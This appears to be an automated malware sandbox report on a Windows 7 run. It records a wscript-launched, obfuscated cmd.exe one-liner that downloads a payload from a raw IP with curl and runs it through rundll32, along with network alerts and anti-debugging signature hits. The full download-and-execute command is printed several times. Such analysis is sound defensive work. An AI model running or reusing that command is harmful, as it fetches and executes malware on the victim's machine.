Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 17, 2023, 10:35 a.m. | Oct. 17, 2023, 10:38 a.m. |
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy
2144-
PING.EXE ping A3ch
2236 -
curl.exe CuRl http://89.147.111.46/gWUA/hyper -o C:\Users\test22\AppData\Local\Temp\A3ch.log
2288 -
PING.EXE ping -n 3 A3ch
2384 -
rundll32.exe rUndLl32 C:\Users\test22\AppData\Local\Temp\A3ch.log scab /k haval462
2432
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
www.ssl.com | 54.174.96.153 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49167 -> 89.147.111.46:80 | 2013028 | ET POLICY curl User-Agent Outbound | Attempted Information Leak |
TCP 192.168.56.103:49167 -> 89.147.111.46:80 | 2034567 | ET HUNTING curl User-Agent to Dotted Quad | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://89.147.111.46/gWUA/hyper |
request | GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt |
request | GET http://89.147.111.46/gWUA/hyper |
cmdline | cmd.exe /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy |
cmdline | "C:\Windows\System32\cmd.exe" /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | ping -n 3 A3ch |
cmdline | cmd.exe /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy |
cmdline | ping A3ch |
cmdline | "C:\Windows\System32\cmd.exe" /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy |
host | 89.147.111.46 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |
parent_process | wscript.exe | martian_process | cmd.exe /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy |
file | C:\Windows\System32\cmd.exe |